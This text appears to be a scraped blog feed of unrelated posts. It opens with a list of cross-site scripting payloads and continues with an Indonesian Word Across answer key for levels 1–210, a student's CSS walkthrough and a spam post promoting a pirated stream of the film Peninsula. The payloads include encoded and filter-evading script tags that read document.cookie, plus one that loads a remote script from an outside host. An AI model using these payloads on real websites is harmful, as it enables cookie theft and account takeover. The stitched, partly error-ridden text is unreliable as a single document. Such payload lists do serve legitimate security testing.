%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e “><s”%2b”cript>alert(document.cookie)</script> “><ScRiPt>alert(document.cookie)</script> “><<script>alert(document.cookie);//<</script> foo<script>alert(document.cookie)</script> <scr<script>ipt>alert(document.cookie)</scr</script>ipt> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ foo\’; alert(document.cookie);//’; </script><script >alert(document.cookie)</script> <img src=asdf onerror=alert(document.cookie)> <BODY ONLOAD=alert(’XSS’)> <script>alert(1)</script> "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script> <video src=1 onerror=alert(1)> <audio src=1 onerror=alert(1)>
© 2019 GitHub, Inc.
Terms
Privacy
Security
Status
Help
Contact GitHub
Pricing
API
Training
Blog
About
1 note
·
View note
Photo

Cobain Nih! 6 Tips Farming Mobile Legends Biar Cepat Kaya
(function(d,a,b,l,e,_) if(d[b]&&d[b].q)return;d[b]=function()(d[b].q=d[b].q;e=a.createElement(l); e.async=1;e.charset='utf-8';e.src='//static.dable.io/dist/plugin.min.js'; _=a.getElementsByTagName(l)[0];_.parentNode.insertBefore(e,_); )(window,document,'dable','script'); dable('setService', 'kabargames.id'); dable('sendLogOnce'); dable('renderWidget', 'dablewidget_1oV9EjXP'); Lagi nyari kunci jawaban game Word Across karena ingin lancar berbahasa Inggris? Buat Kamu yang ingin lancar berbahasa Inggris tapi nggak punya cukup uang untuk ikut kursus atau sekedar membeli kamus Bahasa Inggris. Kamu bisa memanfaatkan game Word Across sebagai sarana belajar dan praktek berbahasa Inggris. Pasalnya, game yang menghubungkan kata dalam bahasa Inggris ini sangat baik buat Kamu yang sedang mempelajari kata-kata dari bahasa Inggris. Kalau kesulitan menjawab dibeberapa level tertentu Kamu bisa menggunakan kunci jawaban game Word Across terlengkap dari level 1 sampai dengan level 210 yang sudah Kabar Games siapakan berikut ini. Baca Juga : Nikahan Mantan: Saatnya Lampiaskan Rasa Sakit Hatimu Disini 5 Hero Mobile Legends dengan Kemampuan Mirip Cheat Map Hack Hiram, Update Berskala Besar Pertama ArcheAge! Ini Fiturnya Genshin Impact: Gameplay, Karakter, Review & Spesifikasi PC Kunci Jawaban Braindom Terbaru dari Level 1 – 225 googletag.cmd.push(function() googletag.display('div-gpt-ad-9949385-2'); ); Kunci Jawaban Word Across Level 1 – 20 Level 1 How, Who Level 2 Add, Dad Level 3 Are, Ear, Era Level 4 Six, Is Level 5 Wall, All, Law Bonus Awl Level 6 Yard, Day, Dry, Ray Bonus Dray, Rad, Rya, Yar Level 7 Your, Our, You Level 8 Wars, Raw, Saw, War, Was Bonus Raws Level 9 Eyes, Eye, See, Yes Level 10 Gold, Dog, God, Log, Old Bonus Dol Level 11 Note, Tone, Net, Not, One, Ten, Toe, Ton Bonus Eon Level 12 Play, Lap, Lay, Pal, Pay Bonus Paly, Alp, Ply, Pya, Yap Level 13 Sink, Skin, Ink, Kin, Sin, Ski Bonus Inks, Kins Level 14 Sends, Ends, Send, Den, End Bonus Dens, Ness, Sned, Eds, Ens Level 15 Eight, Get, Hit, The, Tie Bonus Gite, Gie, Git, Hie, Teg Level 16 Worn, Nor, Now, Own, Row, Won Level 17 Black, Back, Lack, Cab, Lab Bonus Balk, Calk, Alb, Bal, Kab, Lac Level 18 Unity, Tiny, Unit, Nut, Tin Bonus Nit, Tui, Tun, Yin Level 19 Cakes, Cake, Case, Sack, Sake, Ask, Sea Bonus Aces, Cask, Kaes, Keas, Ace, Kas, Kea, Sac, Sec, Ska Level 20 Meets, Meet, Seem, Met, See, Set Bonus Metes, Teems, Emes, Mete, Seme, Stem, Teem, Tees, Eme, Tee Kunci Jawaban Word Across Level 21 – 40 Level 21 Pact, Act, Apt, Cap, Cat, Pat, Tap Bonus Pac Level 22 Hosts, Shots, Host, Shot, Toss, Hot Bonus Hots, Sots, Tosh, Sot, Tho Level 23 Guide, Die, Dig, Due, Dug Bonus Gied, Gude, Ged, Gid, Gie Level 24 Loves, Solve, Lose, Love, Sole Bonus Voles, Levo, Oles, Sloe, Voes, Vole, Lev, Ole, Sel, Sol, Voe Level 25 Seems, Mess, Seem, Sees, See Bonus Semes, Emes, Seme, Eme Level 26 Suits, Sits, Suit, Its, Sit Bonus Situs, Tuis, Sis, Tis, Tui Level 27 Slips, Lips, Slip, Lip, Sip Bonus Lisps, Lisp, Psis, Sips, Sis Level 28 Clues, Clue, Cues, Cue, Sec, Sue, Use Bonus Luces, Ecus, Luce, Lues, Slue, Cel, Leu, Sel Level 29 Petty, Type, Pet, Yep, Yet Bonus Yett, Pye Level 30 Eased, Ease, Seed, Sad, Sea, See Bonus Aedes, Dees, Sade, Ads, Eds Level 31 Doubt, Bout, Bud, But, Dot, Tub, Out, Duo Bonus Bod, Bot, Dub, Oud, Tod Level 32 Drums, Drum, Mud, Rum, Sum Bonus Muds, Rums, Surd, Urds, Urd Level 33 Hardy, Hard, Yard, Day, Dry, Had, Hay, Ray Bonus Hydra, Dray, Dah, Rad, Rya, Yah, Yar Level 34 Deter, Deer, Reed, Tree, Red Bonus Treed, Dere, Dree, Rede, Rete, Teed, Ere, Ree, Ret, Ted, Tee Level 35 Lousy, Soul, Sly, Soy, You Bonus Yous, Sol, Sou Level 36 Allow, Wall, All, Law, Low, Owl Bonus Alow, Olla, Awl Level 37 Wagon, Gown, Ago, Now, Own, Wan, Won Bonus Gowan, Agon, Gnaw, Awn, Gan, Goa, Nag, Nog, Wag Level 38 Brash, Bars, Bash, Rash, Ash, Bar, Bra, Has Bonus Arbs, Bras, Abs, Arb, Sab Level 39 Style, Lets, Let, Set, Yes, Yet Bonus Lest, Leys, Lyes, Lyse, Stye, Tels, Tyes, Ley, Lye, Sel, Sly, Sty Level 40 Texts, Test, Text, Set, Sex Bonus Sett, Sext, Stet, Tets Kunci Jawaban Word Across Level 41 – 60 Level 41 Flood, Fold, Food, Fool, Old Bonus Loof, Dol, Loo Level 42 Sears, Ears, Seas, Are, Ear, Era, Sea Bonus Rases, Eras, Rase, Sear, Sera, Sers, Ers, Res, Ser Level 43 Donor, Door, Odor, Don, Nod, Nor, Rod Bonus Rondo, Ordo, Rood, Dor Level 44 Apply, Play, Lap, Lay, Pal, Pay Bonus Palp, Paly, Alp, App, Pap, Ply, Pya, Yap Level 45 Catch, Chat, Act, Cat, Hat Bonus Tach Level 46 Kicks, Kick, Sick, Sic, Ski Level 47 Seven, Even, Seen, Eve, See Bonus Evens, Neves, Esne, Eves, Neve, Sene, Vees, Ens, Nee Level 48 Third, Dirt, Hid, Hit, Rid Bonus Thir, Dit Level 49 Knelt, Ken, Let, Net, Ten Bonus Kelt, Kent, Lent, Elk, Lek Level 50 Saved, Save, Vase, Sad, Sea Bonus Devas, Deva, Devs, Sade, Ads, Eds, Vas Level 51 Signs, Sings, Sign, Sing, Sins, Gin, Sin Bonus Gins, Sis Level 52 Snack, Sack, Sank, Scan, Ask, Can Bonus Cans, Cask, Kas, Sac, Ska Level 53 Lofty, Loft, Fly, Lot, Toy Bonus Oft Level 54 Berth, Herb, Bet, Her, The Bonus Beth, Reb, Ret Level 55 Mixed, Dime, Die, Dim, Mid, Mix Bonus Idem, Med Level 56 Bends, Beds, Bend, Ends, Send, Bed, Den, End Bonus Bens, Dens, Nebs, Sned, Ben, Bes, Deb, Eds, Ens, Neb Level 57 Rough, Hour, Hog, Hug, Our, Rug Bonus Gor Level 58 Flips, Flip, Lips, Slip, Lip, Sip Bonus Fils, Lisp, Fil Level 59 Ounce, Cone, Once, Cue, One Bonus Unco, Con, Eon Level 60 Brink, Rink, Bin, Ink, Kin, Rib Bonus Birk, Kirn, Irk, Kir, Nib Kunci Jawaban Word Across Level 61 – 80 Level 61 Porch, Chop, Crop, Cop, Hop, Pro Bonus Cor, Orc, Roc Level 62 Notch, Cot, Hot, Not, Ton Bonus Chon, Con, Hon, Nth, Tho Level 63 Thumb, But, Hub, Hum, Hut, Tub Bonus Bhut, Bum, Mut Level 64 Swung, Guns, Snug, Sung, Gun, Sun Bonus Gnus, Gnu Level 65 Comer, Come, Core, More, Ore Bonus Cero, Corm, Merc, Omer, Cor, Moc, Orc, Rec, Rem, Roc, Roe Level 66 Yells, Sell, Yell, Sly, Yes Bonus Ells, Leys, Lyes, Lyse, Ley, Lye, Sel Level 67 Stall, Last, Salt, Tall, All Bonus Talls, Alls, Alts, Lats, Slat, Alt, Lat, Sal, Sat Level 68 Drama, Arm, Dam, Mad, Mar Bonus Damar, Dram, Maar, Mara, Rad, Ram Level 69 Agree, Eager, Gear, Rage, Age, Are, Ear, Era Bonus Eagre, Agee, Ager, Gree, Ere, Erg, Gar, Rag, Ree, Reg Level 70 Grill, Gill, Girl, Ill, Rig Bonus Rill Level 71 Terms, Rest, Stem, Term, Met, Set Bonus Erst, Rems, Rets, Tres, Ers, Rem, Res, Ret, Ser Level 72 Would, Loud, Duo, Low, Old, Owl Bonus Wold, Dol, Dow, Oud, Wud Level 7 Hairy, Airy, Hair, Air, Hay, Ray Bonus Ahi, Rai, Ria, Rya, Yah, Yar Level 74 Crown, Corn, Crow, Worn, Cow, Nor, Own, Row, Won, Now Bonus Con, Cor, Orc, Roc Level 75 Plank, Plan, Lap, Nap, Pal, Pan Bonus Knap, Lank, Alp Level 76 Match, Chat, Math, Act, Cat, Ham, Hat, Mat Bonus Cham, Mach, Tach, Cam, Mac Level 77 Graph, Harp, Gap, Par, Rap Bonus Gar, Hag, Hap, Rag Level 78 Feeds, Feed, Fees, Seed, Fed, Fee, See Bonus Dees, Feds, Def, Eds Level 79 Sixth, Hits, This, His, Hit, Its, Sit, Six Bonus Hist, Sith, Tis Level 80 Dirty, Dirt, Tidy, Dry, Rid, Try Bonus Yird, Dit Kunci Jawaban Word Across Level 81 – 100 Level 81 Bases, Base, Bass, Seas, Sea Bonus Sabes, Sabs, Abs, Bes, Sab Level 82 Event, Even, Teen, Vent, Net, Ten, Vet, Eve Bonus Neve, Nee, Tee Level 83 Lacks, Slack, Lack, Sack, Ask Bonus Calks, Calk, Cask, Lacs, Kas, Lac, Sac, Sal, Ska Level 84 Slots, Loss, Lost, Lots, Slot, Toss, Lot Bonus Sols, Sots, Sol, Sot Level 85 Lands, Land, Sand, And, Lad, Sad Bonus Ands, Dals, Dans, Lads, Ads, Dal, Sal Level 86 Blues, Blue, Bus, Sub, Sue, Use Bonus Lubes, Bels, Lube, Lues, Slub, Slue, Bel, Bes, Leu, Sel Level 87 Needy, Deny, Eyed, Need, Den, Dye, End, Eye Bonus Dene, Dyne, Eyen, Eyne, Dey, Nee, Yen Level 88 Guard, Drag, Drug, Grad, Dug, Rug Bonus Dura, Gaud, Gaur, Guar, Ruga, Dag, Gad, Gar, Rad, Rag, Urd Level 89 Spicy, Icy, Sic, Sip, Spy Bonus Pics, Pyic, Yips, Pic, Yip Level 90 Zones, Nose, Ones, Zone, One, Son Bonus Eons, Noes, Sone, Ens, Eon Level 91 Sinks, Skins, Kiss, Sink, Sins, Skin, Skis, Ink, Kin, Ski, Sin Bonus Inks, Kins, Sis Level 92 Props, Pops, Prop, Pop, Pro Bonus Pros, Sop Level 93 Mount, Unto, Not, Nut, Out, Ton Bonus Notum, Muon, Mon, Mot, Mut, Tom, Tun Level 94 Humor, Hour, Hum, Our, Rum Bonus Mohur, Mho, Ohm Level 95 Shuts, Huts, Shut, Thus, Hut Bonus Tush Level 96 Loser, Roles, Lore, Lose, Role, Rose, Sole, Sore, Ore Bonus Lores, Orles, Sorel, Oles, Ores, Orle, Roes, Sloe, Ers, Ole, Res, Roe, Sel, Ser, Sol Level 97 Fungi, Fin, Fun, Gin, Gun Bonus Fig, Fug, Gnu Level 98 Wally, Ally, Wall, All, Law, Lay, Way Bonus Yawl, Awl, Yaw Level 99 Farms, Arms, Farm, Mars, Arm, Far, Mar Bonus Arfs, Rams, Ram Level 100 Aware, Area, Wear, Are, Awe, Ear, Era, Raw, War Bonus Ware, Awa, Wae Daftar Kunci Jawaban Word Across Level 101 – 120 Level 101 Ghost, Hogs, Host, Shot, Hog, Hot, Got Bonus Goths, Gosh, Goth, Hots, Shog, Togs, Tosh, Sot, Tho, Tog Level 102 Tells, Lest, Lets, Sell, Tell, Let, Set Bonus Ells, Tels, Sel Level 103 Mound, Undo, Don, Duo, Nod, Mud Bonus Muon, Udon, Dun, Mod, Mon, Oud Level 104 Theme, Meet, Them, Hem, The, Met Bonus Heme, Mete, Meth, Teem, Thee, Eme, Tee Level 105 World, Lord, Word, Low, Old, Owl, Rod, Row Bonus Wold, Dol, Dor, Dow Level 106 Firms, Firm, Rims, Fir, Rim, Sir Bonus Firs, Mirs, Rifs, Mir, Rif, Sri Level 107 Rapid, Arid, Drip, Paid, Pair, Raid, Aid, Air, Pad, Par, Rap, Rid, Rip, Dip Bonus Pardi, Pard, Dap, Pia, Rad, Rai, Ria Level 108 Hatch, Chat, Act, Cat, Hat Bonus Hath, Tach Level 109 Plump, Lump, Plum, Pulp, Pump, Pup Bonus Pul, Ump Level 110 Knees, Keen, Knee, Seek, Seen, Ken, See Bonus Keens, Skene, Ekes, Esne, Kens, Sene, Skee, Eke, Ens, Nee Level 111 Width, With, Hid, Hit, Wit Bonus Whid, Whit, Dit Level 112 Blast, Bats, Last, Salt, Slab, Tabs, Bat, Lab, Tab, Stab Bonus Blats, Albs, Alts, Bals, Bast, Blat, Labs, Lats, Slat, Abs, Alb, Alt, Bal, Lat, Sab, Sal, Sat Level 113 Peace, Cape, PaCepe, Cep, Pac, Pea Level 114 Shake, Sake, Ash, Ask, Has, Sea, She Bonus Hakes, Haes, Hake, Kaes, Keas, Shea, Hae, Kas, Kea, Ska Level 115 Plots, Lost, Lots, Plot, Post, Pots, Slot, Spot, Stop, Tops, Lot, Opt, Pot, Top Bonus Lops, Opts, Pols, Slop, Lop, Pol, Sol, Sop, Sot Level 116 Burly, Blur, Bury, Ruby, Buy, Rub Bonus Burl, Bur Level 117 Blush, Bush, Lush, Bus, Hub, Sub Bonus Buhls, Buhl, Hubs, Shul, Slub Level 118 Spend, Ends, Pens, Send, Sped, Den, End, Pen Bonus Pends, Dens, Peds, Pend, Sned, Eds, Ens, Ped, Pes Level 119 Grand, Darn, Drag, Grad, Rand, Rang, And, Ran Bonus Dang, Gnar, Gran, Nard, Dag, Gad, Gan, Gar, Nag, Rad, Rag Level 120 Chips, Chip, Ship, His, Sic, Sip Bonus Chis, Hips, Ichs, Phis, Pics, Pish, Hip, Ich, Pic Kunci Jawaban Word Across Level 121 – 140 Level 121 Cones, Cone, Nose, Once, Ones, One, Sec, Son Bonus Scone, Cons, Eons, Noes, Sone, Con, Ens, Eon Level 122 Saint, Satin, Stain, Anti, Ant, Its, Sin, Sit, Tan, Tin Bonus Antis, Tains, Ains, Aits, Anis, Ants, Nits, Sain, Sati, Snit, Tain, Tans, Tins, Ain, Ait, Ani, Nit, Sat, Tis Level 123 Hazel, Hale, Haze, Heal, Zeal, Ale Bonus Laze, Hae, Lea Level 124 Count, Unto, Cot, Cut, Not, Nut, Out, Ton Bonus Unco, Con, Tun Level 125 Coupe, Cope, Coup, Cop, Cue, Cup Bonus Puce, Cep, Ope Level 126 Budge, Bed, Beg, Bud, Bug, Due, Dug Bonus Debug, Gude, Deb, Dub, Ged Level 127 Taxed, Date, Ate, Axe, Eat, Tad, Tax, Tea Bonus Axed, Tae, Ted Level 128 Bring, Grin, Ring, Big, Bin, Gin, Rib, Rig Bonus Brig, Girn, Gib, Nib Level 129 Aptly, Play, Apt, Lay, Pal, Pat, Pay, Tap, Lap Bonus Platy, Typal, Paly, Paty, Plat, Alp, Alt, Lat, Ply, Pya, Yap Level 130 Genus, Guns, Snug, Sung, Gun, Sue, Sun, Use Bonus Negus, Engs, Gens, Genu, Gnus, Negs, Ens, Gen, Gnu, Neg Level 131 Dared, Dread, Dare, Dead, Dear, Read, Add, Are, Dad, Ear, Era, Red Bonus Adder, Readd, Redd, Rad Level 132 Crawl, Claw, Arc, Car, Law, Raw, War Bonus Carl, Craw, Awl, Caw, Lac, Lar Level 133 Tents, Nest, Nets, Sent, Tent, Test, Net, Set, Ten Bonus Netts, Stent, Nett, Sett, Stet, Tens, Tets, Ens Level 134 Found, Fond, Fund, Undo, Don, Duo, Fun, Nod Bonus Fondu, Udon, Dun, Fon, Fou, Fud, Oud Level 135 Thyme, Myth, Them, They, Hem, Met, The, Yet Bonus Hyte, Meth, Thy Level 136 Clown, Cow, Low, Now, Owl, Own, Won Bonus Cowl, Lown, Col, Con Level 137 Minor, Iron, Norm, Ion, Nor, Rim Bonus Inro, Morn, Noir, Mir, Mon, Nim Level 138 Yacht, Chat, Act, Cat, Hat, Hay Bonus Achy, Chay, Tach, Cay, Thy, Yah Level 139 Abyss, Bass, Bays, Says, Bay, Say Bonus Bassy, Abys, Sabs, Abs, Aby, Ays, Sab Level 140 Knife, Fine, Fin, Ink, Ken, Kin Bonus Fink, Kief, Kine, Fen, Kef, Kif Kunci Jawaban Word Across Level 141 – 160 Level 141 Gamut, Gum, Gut, Mat, Mug, Tag, Tug Bonus Gaum, Gam, Gat, Mag, Mut, Uta Level 142 Drift, Dirt, Rift, Fir, Fit, Rid Bonus Frit, Dif, Dit, Fid, Rif Level 143 Short, Host, Shot, Sort, Hot, Rot Bonus Horst, Hots, Orts, Rhos, Rots, Thro, Tors, Tosh, Ort, Sot, Tho, Tor Level 144 Paced, Cape, Pace, Ace, Ape, Cap, Pad Bonus Caped, Aced, Aped, Cade, Dace, Cep, Dap, Pac, Pea, Ped Level 145 Asked, Desk, Sake, Ask, Sad, Sea Bonus Daks, Kaes, Keas, Sade, Ads, Dak, Eds, Kas, Kea, Ska Level 146 Sheen, Hens, Seen, Hen, See, She Bonus Esne, Sene, Ens, Nee Level 147 Awash, Wash, Ash, Has, Saw, Was Bonus Haws, Shaw, Shwa, Awa, Haw Level 148 Brush, Shrub, Bush, Rubs, Rush, Bus, Hub, Rub, Sub Bonus Buhrs, Buhr, Burs, Hubs, Urbs, Bur Level 149 Lends, Ends, Lend, Lens, Send, Sled, Den, End, Led Bonus Dels, Dens, Elds, Sned, Del, Eds, Eld, Ens, Sel Level 150 Waved, Wade, Wave, Awe, Dew, Wad, Wed Bonus Awed, Deva, Daw, Wae Level 151 Picks, Pick, Sick, Skip, Sic, Sip, Ski Bonus Kips, Pics, Spik, Kip, Pic Level 152 Opens, Nope, Nose, Ones, Open, Pens, Pose, One, Pen, Son Bonus Peons, Pones, Eons, Epos, Noes, Opes, Peon, Peso, Pone, Pons, Sone, Ens, Eon, Ope, Pes, Sop Level 153 Twins, Twin, Wins, Its, Sin, Sit, Tin, Win, Wit Bonus Nits, Snit, Tins, Wist, Wits, Nit, Tis, Wis Level 154 Glaze, Gale, Gaze, Zeal, Age, Ale, Gal, Gel, Lag, Leg Bonus Egal, Laze, Lea, Zag Level 155 Mores, More, Rose, Some, Sore, Ore Bonus Morse, Omers, Mors, Omer, Ores, Rems, Roes, Roms, Ers, Rem, Res, Roe, Ser, Som Level 156 Pouch, Chop, Coup, Ouch, Cop, Cup, Hop Level 157 Snaps, Spans, Pans, Pass, Snap, Span, Nap, Pan, Sap, Spa Bonus Asps, Naps, Sans, Saps, Spas, Asp, Pas Level 158 Tonal, Alto, Loan, Ant, Lot, Not, Tan, Ton Bonus Notal, Talon, Tolan, Lota, Nota, Tola, Alt, Lat, Oat Level 159 Begin, Being, Binge, Beg, Big, Bin, Gin Bonus Bine, Gibe, Ben, Gen, Gib, Gie, Neb, Neg, Nib Level 160 Flats, Fast, Flat, Last, Salt, Aft, Fat Bonus Alts, Fats, Lats, Slat, Alt, Lat, Sal, Sat Kunci Jawaban Word Across Level 161 – 180 Level 161 Puree, Peer, Pure, Per, Rep, Rue Bonus Rupee, Pere, Pree, Ere, Ree Level 162 Amber, Bare, Beam, Bear, Mare, Are, Arm, Bar, Bra, Ear, Era, Mar Bonus Bream, Embar, Barm, Bema, Berm, Brae, Ream, Arb, Bam, Mae, Ram, Reb, Rem Level 163 Fumes, Fuse, Muse, Sue, Use, Sum Bonus Emus, Fems, Feus, Fume, Emu, Fem, Feu Level 164 Belts, Belt, Best, Bets, Lest, Lets, Let, Set, Bet Bonus Blest, Bels, Tels, Bel, Bes, Sel Level 165 Dough, Dog, Dug, Duo, God, Hog, Hug Bonus Hod, Oud Level 166 Deity, Diet, Edit, Tide, Tidy, Tied, Die, Dye, Tie, Yet Bonus Dite, Yeti, Dey, Dit, Ted Level 167 Crowd, Cord, Crow, Word, Cod, Cow, Rod, Row Bonus Cor, Doc, Dor, Dow, Orc, Roc Level 168 Muted, Duet, Mute, Due, Met, Mud Bonus Emu, Med, Mut, Ted, Ute Level 169 Batch, Bath, Chat, Act, Bat, Cab, Cat, Hat, Tab Bonus Bach, Baht, Tach Level 170 Crime, Mice, Rice, Ice, Ire, Rim Bonus Cire, Emic, Emir, Merc, Mire, Rime, Mic, Mir, Rec, Rem Level 171 Libel, Bell, Bile, Bill, Ill, Lie Bonus Bel, Lei, Lib Level 172 Admit, Amid, Maid, Aid, Aim, Dam, Dim, Mad, Mat, Mid, Tad Bonus Adit, Ait, Ami, Dit Level 173 Drink, Kind, Rind, Rink, Din, Kid, Kin, Rid, Ink Bonus Dink, Dirk, Kirn, Irk, Kir Level 174 Youth, Hot, Hut, Out, Toy, You Bonus Thou, Hoy, Tho, Thy Level 175 Ports, Sport, Port, Post, Pots, Sort, Spot, Stop, Tops, Opt, Pot, Pro, Rot, Top Bonus Prost, Strop, Opts, Orts, Pros, Rots, Tors, Trop, Ort, Sop, Sot, Tor Level 176 Snake, Sneak, Sake, Sane, Sank, Ask, Ken, Sea Bonus Kanes, Skean, Anes, Kaes, Kane, Keas, Kens, Ane, Ens, Kas, Kea, Nae, Ska Level 177 Tenth, Tent, Then, Hen, Net, Ten, The Bonus Hent, Nett, Teth, Nth Level 178 Shady, Dash, Days, Hays, Ash, Day, Had, Hay, Sad, Say, Shy, Has Bonus Dashy, Ashy, Dahs, Shad, Shay, Ads, Ays, Dah, Yah Level 179 Champ, Camp, Chap, Cap, Ham, Map Bonus Caph, Cham, Mach, Amp, Cam, Hap, Mac, Pac, Pam Level 180 Dense, Needs, Ends, Need, Seed, Seen, Send, Den, End, See Bonus Denes, Dees, Dene, Dens, Esne, Sene, Sned, Eds, Ens, Nee Kunci Jawaban Word Across Level 181 – 200 Level 181 Spike, Pies, Pike, Skip, Pie, Sip, Ski Bonus Kepis, Pikes, Kepi, Keps, Kips, Sike, Sipe, Skep, Spik, Kep, Kip, Pes, Sei Level 182 Canoe, Ocean, Cane, Cone, Once, Ace, Can, One Bonus Acne, Aeon, Ane, Con, Eon, Nae, Oca Level 183 Drawn, Darn, Dawn, Draw, Rand, Wand, Ward, Warn, And, Ran, Raw, Wad, Wan, War Bonus Nard, Awn, Daw, Rad Level 184 Ninth, Hint, Thin, Hit, Inn, Tin Bonus Hin, Nit, Nth Level 185 Stirs, Sits, Stir, Its, Sir, Sit Bonus Sirs, Sris, Sis, Sri, Tis Level 186 Apple, Leap, Pale, Plea, Ale, Ape, Lap, Pal, Pep Bonus Appel, Palp, Peal, Alp, App, Lea, Pap, Pea Level 187 Scrub, Curb, Rubs, Bus, Cub, Rub, Sub Bonus Curbs, Burs, Crus, Cubs, Curs, Urbs, Bur, Cru, Cur Level 188 Pasta, Past, Pats, Taps, Apt, Pat, Sap, Spa, Tap Bonus Tapas, Spat, Tapa, Asp, Pas, Sat Level 189 Helms, Helm, Mesh, Elm, Hem, She Bonus Elms, Hems, Mels, Mel, Sel Level 190 Owing, Gown, Wing, Gin, Ion, Now, Own, Wig, Win, Won Bonus Wino, Nog Level 191 Aloft, Float, Alto, Flat, Loaf, Loft, Aft, Fat, Lot Bonus Foal, Lota, Tola, Alt, Lat, Oat, Oft Level 192 Cruel, Ulcer, Clue, Cure, Curl, Lure, Rule, Cue, Rue Bonus Lucre, Ecru, Luce, Cel, Cru, Cur, Leu, Rec Level 193 Zebra, Bare, Bear, Are, Bar, Bra, Ear, Era Bonus Braze, Brae, Raze, Arb, Reb Level 194 Mouse, Muse, Some, Sue, Use, Sum Bonus Moues, Emus, Moue, Sumo, Emu, Som, Sou Level 195 Steps, Pest, Pets, Sets, Step, Pet, Set Bonus Pests, Septs, Psst, Sept, Pes Level 196 Cover, Core, Cove, Over, Rove, Ore, Rev Bonus Cero, Cor, Orc, Rec, Roc, Roe, Voe Level 197 Rebel, Beer, Reel, Bee, Eel, Lee Bonus Leer, Bel, Ere, Reb, Ree Level 198 Cloud, Could, Cold, Loud, Cod, Duo, Old Bonus Clod, Col, Cud, Doc, Dol, Oud Level 199 Field, Filed, File, Fled, Idle, Lied, Life, Die, Elf, Fed, Led, Lid, Lie Bonus Felid, Flied, Deil, Deli, Diel, Lief, Def, Del, Dif, Eld, Fid, Fil, Lei Level 200 Boost, Boots, Boot, Soot, Sob, Too Bonus Boos, Bots, Oots, Stob, Bot, Sot Kunci Jawaban Word Across Level 200 – 210 Level 201 Thank, Hank, Tank, Than, Ant, Hat, Tan Bonus Ankh, Hant, Khan, Khat, Kat, Nth Level 202 Grief, Fire, Rife, Ire, Rig, Fir Bonus Frig, Reif, Erg, Fer, Fig, Gie, Ref, Reg, Rif Level 203 Smart, Arms, Arts, Mars, Mast, Mats, Rats, Star, Tram, Arm, Art, Mar, Mat, Tar, Rat Bonus Marts, Trams, Mart, Rams, Tams, Tars, Tsar, Ram, Sat Level 204 Finds, Find, Fins, Din, Dis, Fin, Sin Bonus Difs, Dins, Fids, Dif, Fid Level 205 Mouth, Moth, Hot, Hum, Hut, Out Bonus Thou, Mho, Mot, Mut, Ohm, Tho, Tom Level 206 Story, Rosy, Sort, Toys, Rot, Soy, Toy, Try Bonus Ryots, Stroy, Troys, Tyros, Orts, Rots, Ryot, Tors, Tory, Troy, Tyro, Ort, Sot, Sty, Tor Level 207 Beams, Base, Beam, Mesa, Same, Seam, Sea Bonus Bemas, Mabes, Bams, Bema, Maes, Abs, Bam, Bes, Mae, Sab Level 208 Stalk, Talks, Last, Salt, Talk, Task, Ask Bonus Alts, Kats, Lats, Skat, Slat, Alt, Kas, Kat, Lat, Sal, Sat, Ska, Tsk Level 209 Cards, Arcs, Card, Cars, Scar, Arc, Car, Sad Bonus Cads, Rads, Sard, Scad, Ads, Rad, Sac Level 210 Doors, Door, Odor, Rods, Rod, Sod Bonus Odors, Ordos, Roods, Dors, Ordo, Rood, Dor Nah itulah tadi semua Kunci Jawaban game Word Across terlengkap dari level 1 sampai dengan level 210. Kabar Games akan mengupdatenya kembali jika telah menemukan kunci jawaban ke level lebih tinggi lainnya, jangan lupa baca juga kunci jawaban Tebak Gambar, TTS Pintar, TTS Jenius, Brain Blow, Stump Me dan Tebak Tebakan 2020! Nantikan terus berita terbaru dan terupdate seputar game dan gadget hanya di Kabar Games. (function(d,a,b,l,e,_) if(d[b]&&d[b].q)return;d[b]=function()(d[b].q=d[b].q;e=a.createElement(l); e.async=1;e.charset='utf-8';e.src='//static.dable.io/dist/plugin.min.js'; _=a.getElementsByTagName(l)[0];_.parentNode.insertBefore(e,_); )(window,document,'dable','script'); dable('setService', 'kabargames.id'); dable('sendLogOnce'); dable('renderWidget', 'dablewidget_KoEP9KXB');
https://www.kabargames.id/cobain-nih-6-tips-farming-mobile-legends-biar-cepat-kaya/
#TipsTrick #MobileLegends
0 notes
Text
CSS - Image and Text
Changes the style of the headline text ‘About Me’
Line 87 - Sets the weight of the font to bold
Line 88 - sets the font family
Line 89 - aligns the text to the left of the div it is placed in.
Line 93 - Sets the position relative to its normal position/layout.
Changing the style of the <hr> line.
Line 96 - changes the look of the border setting it to 2px, a solid line and the colour to #AF8748 (golden yellow).
Line 97 - sets width of line to 150px
Line 98 - margin at top of the line to 0px
Line 99 - margin at bottom of the line to 50px creating space betweem the line and start of the text below.
Line 100 - positions the line relative to the nearest anchor
Line 101 - aligns the content to the left
Changes the size, margin and padding of the sophia image.
Line 114 - sets height to 400px
Line 115 - sets the width to 500px
Line 116 & 117 - sets left margin and padding to 40px creating a tab effect from the left of the screen.
Line 122 - align the text to the left of the div.
Line 123 - sets the colour of the font to black
Line 124 - sets the font family to 500 value which is weight
Line 125 - sets size of the font to 20 pixels
These made all of the content that uses this class tab into the page sticking to the style in the design both are the same but flipped. Except from the text-align: right that is used to edit some text on a different page.
The code above is used to make the image go on the right of the screen as well as making the content responsive to the resizing of the web browser and being viewed on different platforms that have smaller screen sizes.
The responsive change happens when the page hits a minimum width of 700px and the placement of the content change to make the image go on top of the text instead of on the left of it. This code is seen from line 149 to 167.
0 notes
Text
Ver~ Peninsula [2020] Pelicula Completa Latino Mega ☆HD☆
Ver~ Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆
Ver~ Peninsula Pelicula Completa Latino ☆HD☆2020,Ver~ Peninsula Pelicula Completa en Español Latino 2020,Ver~ Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Ver~ Peninsula 2020 Pelicula Completa latino HD 1080p,

"
A soldier and his team battle hordes of post-apocalyptic zombies in the wastelands of the Korean Peninsula bioskopin21.xyz.
Peninsula 2020
